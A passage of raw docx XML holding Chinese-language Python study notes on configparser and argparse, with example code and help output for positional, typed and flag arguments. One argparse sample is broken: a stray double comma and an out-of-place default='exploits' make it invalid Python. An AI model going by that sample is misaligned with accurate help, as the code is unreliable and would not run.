    <w:p w14:paraId="79B50458" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config.set('menu', 'help', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(F1)')  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法新增必须有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30748B25" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fo = open(path, 'w', encoding='UTF-8')  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新创建配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AE8EE" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">config.write(fo)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据写入配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C52E32" w14:textId="7796A7CF" w:rsidR="008710D9" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>fo.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025D1DD" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B0AC5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc159779906"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>argparse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="04D0E92B" w14:textId="609CEF12" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidR="00A954CA" w:rsidRPr="0045502F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://docs.python.org/zh-cn/3/howto/argparse.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04FF6EAF" w14:textId="7F8C63F2" w:rsidR="00A954CA" w:rsidRDefault="00A954CA" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E33605" w14:textId="6FD8D479" w:rsidR="00A954CA" w:rsidRPr="00776C88" w:rsidRDefault="00A954CA" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>哪里解析就放程序哪里，不要搞</w:t>
      </w:r>
      <w:r w:rsidRPr="00776C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r w:rsidRPr="00776C88">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00776C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D8BC2" w14:textId="0ECB8820" w:rsidR="00776C88" w:rsidRPr="00776C88" w:rsidRDefault="00776C88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果没有对该参数传参，默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="00776C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C1D1F" w14:textId="0E62883E" w:rsidR="001E71C1" w:rsidRPr="001E71C1" w:rsidRDefault="001E71C1" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E71C1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>短命令都写得不能运行，只有长命令能运行</w:t>
      </w:r>
      <w:r w:rsidR="00776C88">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C09E9" w14:textId="5F7988A5" w:rsidR="00A954CA" w:rsidRDefault="00A954CA" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行解析的代码</w:t>
      </w:r>
      <w:r w:rsidRPr="004A7E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不要再进行封装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DB35D8" w14:textId="54BC8650" w:rsidR="001E71C1" w:rsidRPr="004A7E2D" w:rsidRDefault="001E71C1" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="752"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8DBC62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="_Toc159779907"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定传参参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:p w14:paraId="2180EA6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADFD82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E360FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>parser = argparse.ArgumentParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C6794" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="001E71C1" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E71C1">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>parser.add_argument("echo", help="echo the string you use here")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE9646" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207B87E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>print(args.echo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DBB67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344B1B30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>演示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405EBFD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>python3 prog.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1F51F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>usage: prog.py [-h] echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16555638" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D95F69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>positional arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E1A68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo        echo the string you use here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7EAC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B612A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F68C5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  -h, --help  show this help message and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55741471" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="_Toc159779908"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定传参参数类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="61411D86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A167BCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>parser = argparse.ArgumentParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F8049" w14:textId="77777777" w:rsidR="00162A80" w:rsidRPr="000E3D94" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3D94">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>parser.add_argument("square", help="display a square of a given number",</w:t>
      </w:r>
      <w:r w:rsidR="00BC48AF" w:rsidRPr="000E3D94">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00162A80" w:rsidRPr="000E3D94">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, default='exploits'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D39D" w14:textId="75393B98" w:rsidR="004C452C" w:rsidRPr="000E3D94" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9E2911" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="000E3D94" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3D94">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    type=int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A54E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8190E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>args.square</w:t>
      </w:r>
      <w:r>
        <w:t>**2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A60096" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc159779909"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短选项（命令行缩写）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w14:paraId="022C0AAB" w14:textId="55365963" w:rsidR="00E832AB" w:rsidRDefault="00E832AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store_true</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的参数，来标注明他是一个标志</w:t>
      </w:r>
      <w:r w:rsidR="00957F55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>性传参</w:t>
      </w:r>
      <w:r w:rsidR="00957F55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不需要值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，平常没必要写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54553768" w14:textId="77777777" w:rsidR="00E832AB" w:rsidRDefault="00E832AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B712D71" w14:textId="6EA1E82F" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE935AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>parser = argparse.ArgumentParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCE2F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>parser.add_argument("-v", "--verbose", help="increase output verbosity",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C3BFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    action="store_true")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275D7A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE5EAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if args.verbose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E32A94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("verbosity turned on")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E559CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc159779910"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无参数值的标志性参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p w14:paraId="70B2750B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里以</w:t>
      </w:r>
      <w:r>
        <w:t>--verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例，这里对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args.verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行布尔值的检查。如果我们向之前的普通位置参数传参那样，那么无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下，或者输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是后面没有跟值，都是默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09411EF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我们希望的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只是一个标志性的传参，所以需要多写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store_true</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的参数，来标注明他是一个标志性传参。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D6F81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBB5AD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197CB2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A99F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>parser = argparse.ArgumentParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D0CAE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>parser.add_argument("--verbose", help="increase output verbosity",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03FE24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
